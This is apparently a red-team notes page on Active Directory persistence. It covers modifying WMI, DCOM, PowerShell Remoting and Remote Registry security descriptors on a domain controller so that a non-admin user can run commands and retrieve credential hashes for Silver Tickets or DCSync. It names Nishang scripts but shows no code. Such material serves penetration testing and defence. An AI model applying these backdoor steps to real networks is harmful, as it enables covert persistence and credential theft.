Modifying Remote Protocol Security Descriptors
This is an interesting way to obtain persistence because the ACL's for Remoting Protocols are rarely audited.
You must have Domain Admin privileges to perform these attacks. Modifying these descriptors can give non-admin users access to such things as WMI, Powershell Remoting, and the Remote Registry without having to give him Domain Admin privileges.
Subsequently the non-admin user will then be able to execute commands on the DC despite not being an admin.
Modifying the Descriptors Manually From the DC - Giving a User Full Control Over the WMI Namespace
Step 1 - In Component Services, Change the DCOM Permissions of the Computer
Give the user Remote Access permissions
Then give him all Launch and Activation permissions
Step 2 - Modify the WMI Namespace Settings in Computer Management
Give the user full rights over the root WMI namespace
Then make sure those rights apply to all of the child namespaces as well
Step 3 - Check the Access of the Non-Admin User to the DC
Now our user can execute commands on the DC.
Giving a User Access to WMI From Powershell
With Set-RemoteWMI.ps1 (from Nishang)
Then login as that user and check the access:
To Remove the Modified Descriptor
Change the Powershell Remoting Descriptors
With Set-RemotePSRemoting.ps1 (from Nishang)
Then Execute Commands Remotely on the DC
Changing the Remote Registry to Add a Backdoor and Retrieve Hashes
Step 1 - With Add-RemoteRegBackdoor.ps1
Step 2 - In a New Window as the User, Use RemoteHashRetrieval.ps1
Step 3 - Exploit
With the DC hash we can create Silver Tickets.
With the Local Administrator hash we can DCSync or take advantage of the local Administrator hash being the DSRM password.
Last updated